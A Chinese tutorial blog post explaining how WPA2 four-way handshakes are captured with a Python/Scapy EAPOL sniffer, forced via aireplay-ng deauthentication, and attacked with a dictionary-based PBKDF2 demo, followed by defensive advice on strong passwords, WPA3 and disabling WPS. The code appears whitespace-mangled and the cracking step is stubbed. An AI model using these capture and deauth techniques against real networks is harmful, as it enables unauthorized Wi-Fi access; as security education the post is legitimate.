Wi-Fi 破解原理与防御:用 Python + Scapy 抓取“握手包”并跑字典,硬核演示 WPA2 弱点

Wi-Fi 破解原理与防御:用 Python + Scapy 抓取“握手包”并跑字典,硬核演示 WPA2 弱点

🚨 前言:你家的 Wi-Fi 为什么不安全?

WPA2 协议看似铜墙铁壁,但它有一个致命的设计逻辑缺陷
设备(手机/电脑)连接路由器时,必须进行**“四次握手” (4-Way Handshake)** 来验证密码是否正确。
这个过程是公开广播的。
黑客只要在旁边静静地“听”到这四次握手的数据包,把它抓回家,就可以关起门来用字典疯狂尝试密码,直到计算出的哈希值与抓到的包匹配。

攻防逻辑示意图 (Mermaid):

1. 请求连接2. 发送随机数 Anonce3. 发送随机数 Snonce + MIC (关键)4. 确认

抓取握手包

跑字典/暴力破解

用户手机

路由器 AP

黑客 (监听模式)

本地电脑

得出明文密码


🛠️ 准备工作

  1. 硬件:你需要一个支持监听模式 (Monitor Mode) 的无线网卡(如 RTL8812AU, AR9271 等)。
  2. 环境:Kali Linux 或 Ubuntu(Windows 下 Scapy 开启监听模式较麻烦)。
  3. 依赖
pip install scapy # 开启监听模式 (假设网卡是 wlan0)sudo airmon-ng start wlan0 

📡 第一步:编写 Python 嗅探器抓取 EAPOL 包

WPA2 的握手包在网络协议中被称为 EAPOL (Extensible Authentication Protocol over LAN)。我们要利用 Scapy 过滤出这种包。

核心代码 (sniffer.py):

from scapy.allimport*import sys # 设置要监听的网卡 (通常是 wlan0mon) IFACE ="wlan0mon"print(f"[*] 正在监听 {IFACE} 上的握手包...")defpacket_handler(pkt):# 过滤 EAPOL 协议的包if pkt.haslayer(EAPOL):# EAPOL 包通常在 802.11 帧中if pkt.haslayer(Dot11):# 获取发送方和接收方的 MAC 地址 addr1 = pkt.addr1 # 接收方 (Destination) addr2 = pkt.addr2 # 发送方 (Source)print(f"[+] 捕获 EAPOL 包: {addr2} -> {addr1}")# 将包保存到本地 pcap 文件 wrpcap("handshake.pcap", pkt, append=True)# 开始嗅探# store=0 表示不在内存中保存包,防止内存溢出 sniff(iface=IFACE, prn=packet_handler, store=0)

实战操作:

  1. 运行脚本。
  2. 为了加速抓包,通常会使用 aireplay-ng 发送**“断网攻击 (Deauth)”**,强制目标设备掉线。
  3. 目标设备自动重连时,脚本就会抓到 4 个 EAPOL 包,存入 handshake.pcap

🔐 第二步:Python 模拟字典攻击 (原理演示)

抓到包后,我们如何从乱码中算出密码?
WPA2 的加密核心是 PBKDF2 算法。

计算公式:

简单来说:我们用字典里的密码算出 MIC,如果算出来的 MIC 和抓包里的 MIC 一样,密码就对了。

破解演示代码 (cracker.py):
(注意:Python 跑 PBKDF2 速度很慢,生产环境通常用 C 写的 aircrack-ng 或 GPU 加速的 hashcat,这里仅做原理解析)

import hashlib import hmac from binascii import a2b_hex defcalc_pmk(ssid, password):""" 计算成对主密钥 (PMK) 算法:PBKDF2(HMAC-SHA1, password, ssid, 4096, 32) """return hashlib.pbkdf2_hmac('sha1', password.encode('utf-8'), ssid.encode('utf-8'),4096,32)deftry_crack(ssid, dictionary_file):print(f"[*] 开始破解 SSID: {ssid}")withopen(dictionary_file,'r', errors='ignore')as f:for line in f: password = line.strip()iflen(password)<8:continue# 模拟计算过程(真实场景还需要结合 Anonce/Snonce 计算 PTK)# 这里仅演示最耗时的 PMK 计算步骤 pmk = calc_pmk(ssid, password)# 假设我们有一个函数 check_mic(pmk, captured_packet) # if check_mic(pmk, captured_data):# print(f"🎉 密码找到: {password}")# break# 打印进度 sys.stdout.write(f"\r正在尝试: {password}") sys.stdout.flush()# try_crack("MyHomeWiFi", "dict.txt")

🛡️ 防御篇:如何保护你的 Wi-Fi?

既然知道了攻击原理,防御就很有针对性了。

1. 杜绝弱密码

从原理可知,破解成功率完全取决于字典里有没有你的密码。

  • ❌ 弱密码:12345678, admin123, 88888888 (分分钟被秒破)。
  • ✅ 强密码:Tr0ub4dor&3 (包含大小写、数字、特殊符号,且长度>12位,基本无法通过跑字典破解)。
2. 使用 WPA3

WPA3 引入了 SAE (对等实体同时验证) 协议。

  • 它不传输易被离线破解的哈希值。
  • 即使黑客抓到了包,也无法在本地离线跑字典。
  • 建议: 在路由器设置中,将加密模式改为 WPA2/WPA3 混合模式仅 WPA3
3. 关闭 WPS (Wi-Fi Protected Setup)

虽然本文讲的是抓握手包,但 WPS(那个为了方便连接的按钮/PIN码)是另一个巨大的安全漏洞,建议直接在路由器后台关闭。


📝 总结

通过 Python + Scapy,我们揭开了 Wi-Fi 破解的神秘面纱。
这并不是什么高深的魔法,而是利用了 WPA2 协议必须“广播握手”的特性。
作为开发者和架构师,理解攻击链条,才能设计出更安全的网络架构。

再次提醒:技术无罪,请勿作恶。保护好自己的网络,才是学习黑客技术的最终目的。

(觉得硬核?点赞、收藏,下期教你《如何用 Python 识别局域网内的 ARP 欺骗攻击》!)

Read more

解决Markdown笔记图片失效问题:Gitee+PicGo图床搭建全攻略

解决Markdown笔记图片失效问题:Gitee+PicGo图床搭建全攻略

引言:为什么要解决搭建图床? 你是否遇到过这样的场景: * 用 Obsidian 写了半年的知识库,换电脑时发现 所有图片都变成 “破碎图标”; * 把 Markdown 笔记分享给同事,对方打开后 图片全是本地路径,根本看不到内容; * 尝试用云盘链接替代,却因为 “防盗链” 或 “链接过期”,图片还是无法正常显示…… 本地 Markdown 笔记的 “图片依赖本地路径”,是困扰无数创作者的痛点。而解决这个问题的核心,就是搭建一个 “图床” —— 把图片托管到云端,让链接永远有效。 本文将带你用 “Gitee(国内免费仓库)+ PicGo(自动上传工具)+ Node.js(运行环境)” 搭建图床,不仅解决 “图片失效”,还能实现: * ✔️ 国内访问快:Gitee 服务器在国内,无需科学上网,图片秒加载; * ✔️ 完全免费:Gitee

By Ne0inhk

OpenClaw 最新功能大揭秘!2026年最火开源AI Agent迎来史诗级升级,手机变身AI终端不是梦

OpenClaw 最新功能大揭秘!2026年最火开源AI Agent迎来史诗级升级,手机变身AI终端不是梦 大家好,我是Maynor。最近开源社区彻底炸锅了——OpenClaw(前身Clawdbot/Moltbot)又一次刷屏!这个能真正“干活”的本地AI助手,在3月2日刚刚发布v2026.3.1版本,紧接着2月底的v2026.2.26也是里程碑式更新。 从外部密钥管理、线程绑定Agent,到Android深度集成、WebSocket优先传输……OpenClaw正在把“AI常驻员工”从概念变成现实。 今天这篇图文并茂的干货,带你一口气看懂最新功能、安装上手和实战价值!

By Ne0inhk
Qoder+Skills,一个人一周完成开源官网重构

Qoder+Skills,一个人一周完成开源官网重构

"你的官网,AI 能读懂吗?"当我第一次把 Higress 文档链接丢给 Claude,让它帮我写个接入 Demo 时,AI 的回复是:"抱歉,我无法有效解析这个页面的内容结构…"这一刻我意识到:我们的文档,正在被时代淘汰。 00 TL;DR * 🏗️ 技术栈大换血:迁移到 Astro 5 + Starlight,Lighthouse 性能跑分 100 分。 * 🤖 AI 友好:接入 llms.txt 标准,支持 Cursor、Claude Code 等 主流 AI Coding 工具。 * 🎯 AI 全能助手:

By Ne0inhk

Vscode中配置Claude code的git bash链接问题

解决VS Code中Claude Code的Git Bash链接问题 问题描述 在VS Code中使用Claude Code时出现错误提示: Error: Claude Code on Windows requires git-bash (https://git-scm.com/downloads/win). 确定git已经安装成果,且按照官方建议设置环境变量CLAUDE_CODE_GIT_BASH_PATH仍无效。 解决方案 删除特定环境变量 在Windows环境变量的用户变量部分,检查并删除CLAUDE_CODE_GIT_BASH_PATH变量(如果存在)。 将Git CMD添加到PATH 编辑用户变量中的Path,添加Git的cmd文件夹路径: * 用户级安装路径:%USERPROFILE%\AppData\Local\Programs\Git\cmd * 全局安装路径:C:\Program Files\

By Ne0inhk